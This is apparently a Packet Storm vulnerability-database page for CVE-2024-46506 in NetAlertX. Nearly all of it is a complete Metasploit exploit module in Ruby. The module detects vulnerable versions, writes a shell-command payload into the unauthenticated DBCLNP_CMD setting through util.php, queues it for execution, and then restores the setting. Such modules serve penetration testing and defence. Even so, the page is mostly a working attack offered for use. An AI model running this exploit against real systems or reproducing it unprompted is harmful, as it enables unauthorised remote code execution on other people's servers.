NetAlertX 24.9.12 Command Injection

🗓️ 11 Feb 2025 00:00:00Reported by chebuya, Takahiro YokoyamaType

packetstorm🔗 packetstorm.news👁 460 Views

Unauthenticated RCE in NetAlertX allows attackers to modify settings and gain remote control.

Reporter	Title	Published	Views	Family All 19
GithubExploit	Exploit for Missing Authentication for Critical Function in Netalertx	27 Dec 202522:07	–	githubexploit
Circl	CVE-2024-46506	30 Jan 202512:03	–	circl
CNNVD	NetAlertX 安全漏洞	13 May 202500:00	–	cnnvd
CNNVD	NetAlertX 安全漏洞	13 May 202500:00	–	cnnvd
CVE	CVE-2024-46506	13 May 202500:00	–	cve
Cvelist	CVE-2024-46506	13 May 202500:00	–	cvelist
Metasploit	NetAlertX File Read Vulnerability	25 Feb 202518:53	–	metasploit
Metasploit	Unauthenticated RCE in NetAlertX	11 Feb 202518:55	–	metasploit
Nuclei	NetAlertX 23.01.14–24.x < 24.10.12 - Remote Code Execution	1 Jun 202605:38	–	nuclei
NVD	CVE-2024-46506	13 May 202516:15	–	nvd

##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      prepend Msf::Exploit::Remote::AutoCheck
      include Msf::Exploit::Retry
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Unauthenticated RCE in NetAlertX',
            'Description' => %q{
              An attacker can update NetAlertX settings with no authentication, which results in RCE.
            },
            'Author' => [
              'Chebuya (Rhino Security Labs)', # Vulnerability discovery and PoC
              'Takahiro Yokoyama' # Metasploit module
            ],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2024-46506'],
              ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/'],
              # ['URL', 'https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-46506'], Not published (yet?)
            ],
            'DefaultOptions' => {
              'FETCH_DELETE' => true,
              'WfsDelay' => 150
            },
            'Platform' => %w[linux],
            'Targets' => [
              [
                'Linux Command', {
                  'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd
                }
              ],
            ],
            'DefaultTarget' => 0,
            'Payload' => {
              'BadChars' => ' \'\\'
            },
            'DisclosureDate' => '2025-01-30',
            'Notes' => {
              'Stability' => [ CRASH_SAFE, ],
              'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
              'Reliability' => [ REPEATABLE_SESSION, ]
            }
          )
        )
    
        register_options(
          [
            Opt::RPORT(20211),
            OptInt.new('WAIT', [ true, 'Wait time (seconds) for the payload to be set', 75 ]),
            OptBool.new('CLEANUP', [false, 'Restore DBCLNP_CMD to original value after execution', true])
          ]
        )
        register_advanced_options(
          [
            OptString.new('Base64Decoder', [true, 'The binary to use for base64 decoding', 'base64-short', %w[base64-short] ])
          ]
        )
      end
    
      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'maintenance.php')
        })
        return Exploit::CheckCode::Unknown unless res&.code == 200
    
        html_document = res&.get_html_document
        return Exploit::CheckCode::Unknown('Failed to get html document.') if html_document.blank?
    
        version_element = html_document.xpath('//div[text()="Installed version"]//following-sibling::*')
        return Exploit::CheckCode::Unknown('Failed to get version element.') if version_element.blank?
    
        version = Rex::Version.new(version_element.text&.strip&.sub(/^v/, ''))
        return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('23.01.14'), Rex::Version.new('24.9.12'))
    
        Exploit::CheckCode::Appears("Version #{version} detected.")
      end
    
      def exploit
        # Command is split by space character, and executed by the following Python code:
        # subprocess.check_output(command, universal_newlines=True, stderr=subprocess.STDOUT, timeout=(set_RUN_TIMEOUT))
        # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L206
        # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L214
        cmd = "/bin/sh -c #{payload.encode}"
        update_settings(cmd, '*')
        # Not updated immediately
        print_status('Waiting for the settings to be properly updated...')
        retry_until_truthy(timeout: datastore['WAIT']) do
          check_settings(cmd)
        end
        add_to_execution_queue('run|DBCLNP')
        add_to_execution_queue('cron_restart_backend')
        print_status('Added the payload to the queue. Waiting for the payload to run...')
      end
    
      def update_settings(cmd, sche)
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, 'php/server/util.php'),
          'vars_post' => {
            'function' => 'savesettings',
            'settings' => [
              ['DBCLNP', 'DBCLNP_RUN', 'string', 'schedule'],
              ['DBCLNP', 'DBCLNP_CMD', 'string', cmd],
              ['DBCLNP', 'DBCLNP_RUN_SCHD', 'string', "#{sche} * * * *"],
            ].to_json
          }
        })
        fail_with(Failure::Unknown, 'Failed to update settings.') unless res&.code == 200
        print_status("Sent request to update DBCLNP_CMD to '#{cmd}'.")
      end
    
      def add_to_execution_queue(cmd)
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(target_uri.path, 'php/server/util.php'),
          'vars_post' => {
            'function' => 'addToExecutionQueue',
            'action' => "#{SecureRandom.uuid}|#{cmd}"
          }
        })
        fail_with(Failure::Unknown, 'Failed to add the payload to the queue.') unless res&.code == 200
      end
    
      def check_settings(cmd)
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'api/table_settings.json')
        })
        return unless res&.code == 200
    
        res.get_json_document['data']&.detect { |row| row['Code_Name'] == 'DBCLNP_CMD' && row['Value'] == cmd }
      end
    
      def cleanup
        super
    
        if datastore['CLEANUP']
          # Default settings, isn't usually changed.
          # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/front/plugins/db_cleanup/config.json#L92
          update_settings(
            'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}',
            '*/30'
          )
        end
      end
    end

11 Feb 2025 00:00Current

7.3High risk

Vulners AI Score7.3

EPSS0.90959